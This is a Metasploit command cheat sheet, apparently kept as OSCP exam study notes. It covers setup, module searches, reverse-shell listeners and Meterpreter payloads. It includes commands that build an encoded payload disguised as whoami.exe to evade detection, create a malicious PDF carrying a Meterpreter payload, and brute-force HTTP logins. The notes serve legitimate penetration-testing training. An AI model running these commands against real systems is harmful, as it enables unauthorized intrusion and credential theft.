Metasploit

Framework to manage vulnerabilities and exploits.

❗ NOT ALLOWED DURING THE OSCP EXAM. Limited to one machine, NO AD machine!

💡 For generating payloads, see Msfvenom.
💡 For Meterpreter sessions, see Meterpreter.

• Msfconsole Commands

Update Metasploit

NOTE: msfupdate is deprecated.

sudo apt update
sudo apt upgrade metasploit-framework

Start & Setup

Setup

Build the database, first time only.

sudo service postgresql start

sudo msfdb init

Fix message: “To use retry middleware with Faraday v2.0+, install faraday-retry gem”

sudo gem install faraday-retry

Start the Metasploit console

sudo msfconsole -q

If msfconsole is broken…

cd /usr/share/metasploit-framework
sudo gem install bundler:2.2.5
sudo bundle install

Workspaces

Use workspaces to separate results from investigations.

List workspaces

workspace

Use an existing workspace

workspace <workspace name>

Create a workspace

workspace -a <workspace name>

Delete a workspace

workspace -d <workspace name>

Modules

Auxiliary modules (enumeration, scanners, fuzzing, sniffing)

Hierarchical syntax:

• <module>/<type or OS>/<vendor>/<app>
• <protocol>/<module>

show auxiliary

search type:auxiliary name:http

Listener

Netcat

Use with non-staged reverse TCP payloads

sudo nc -lnvp 443

Multi Handler

💡 The Multi Handler is allowed on ALL machines during the OSCP exam, but any Meterpreter payload IS RESTRICTED to one machine.

• -j: run in background (use jobs command)
• -z: do not automatically interact with the session

Resource scripts

Write all commands in a file and execute it.

sudo msfconsole -q -r <script name>.rc

Basic example

use exploit/multi/handler
set PAYLOAD [msfvenom Payload name]
set LHOST [Kali IP address]
set LPORT [Listening port on Kali]
set ExitOnSession false
exploit -j -z

Advanced example

The StageEncoder is used to try evading detection for the second part of a staged payload.

use exploit/multi/handler
set PAYLOAD [msfvenom Payload name]
show advanced
set LHOST [Kali IP address]
set LPORT [Listening port on Kali]
set EXITFUNC thread
set ExitOnSession false
set AutoRunScript windows/gather/enum_logged_on_users
set AutoRunScript post/windows/manage/migrate
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set Workspace test
exploit -j -z

jobs
jobs -i <job id>
kill <job id>

Example for TCP listener on Kali, Meterpreter

msfconsole -q
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
set ExitOnSession false
exploit -j -z

sessions -l -v
sessions -i <session_id>

Vulnerabilities & Exploits

Search vulnerabilities/exploits

search -h

Search for a specific vulnerability

search ms03-026

search cve:2021 type:exploit

search cve:2021 type:exploit rank:excellent

search browser chrome type:exploit date:2021

Exploit a vulnerability

Use the vulnerability (copy the path in Name column after the search)

use exploit/windows/dcerpc/ms03_026_dcom

Show payloads

Module exploits require a payload. When not specified, a default payload will be used.

show payloads

set payload windows/shell_reverse_tcp

Generating a payload

💡 For generating payloads, see Msfvenom.

use windows/shell_reverse_tcp
generate LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/whoami.exe -o myprecious.exe

Show module options

Will require some input, like IP addresses, show what is needed.

show options

show advanced

Set module options

set RHOST x.x.x.x

show options

Set module options – globally

setg RHOSTS x.x.x.1-254

setg LHOST tun0

Run the module

Will return a meterpreter session connected to the victim

run

exploit

💡 For Meterpreter sessions, see Meterpreter.

Nmap

Execute Nmap within Metasploit and save the results into Metasploit’s database.

db_nmap <nmap options>

db_nmap -A -Pn x.x.x.x

Hosts Information

Services

services -h

services

services -p 80

Search for hosts with open port 80, then sets the RHOSTS options with the results.

services -p 80 --rhosts

Hosts

hosts -h

hosts

Build Metasploit Modules

Building a Module

Msfconsole will look in ~/.msf4/modules. So when using sudo msfconsole, it will look in /root/.msf4/modules.

Generate malicious PDF file for Windows

search type:exploit platform:windows adobe pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
exploit (adobe_pdf_embedded_exe) > info
exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
exploit (adobe_pdf_embedded_exe) > show options
exploit (adobe_pdf_embedded_exe) > set INFILENAME chapter1.pdf
exploit (adobe_pdf_embedded_exe) > set FILENAME chapter1.pdf
exploit (adobe_pdf_embedded_exe) > set LHOST x.x.x.x
exploit (adobe_pdf_embedded_exe) > show options
exploit (adobe_pdf_embedded_exe) > exploit

# Metasploit has placed this file at /root/.msf4/local/chapter1.pdf.

Quit Metasploit

exit

Bruteforce Oracle Weblogic & HTTP Basic Auth

echo "weblogic" > /root/users.txt

msfconsole
use auxiliary/scanner/http/http_login
set user_file /root/users.txt
set pass_file /usr/share/wordlists/rockyou.txt
set rhosts x.x.x.x
set rport 7879
set SSL true
set threads 5
set stop_on_success true
exploit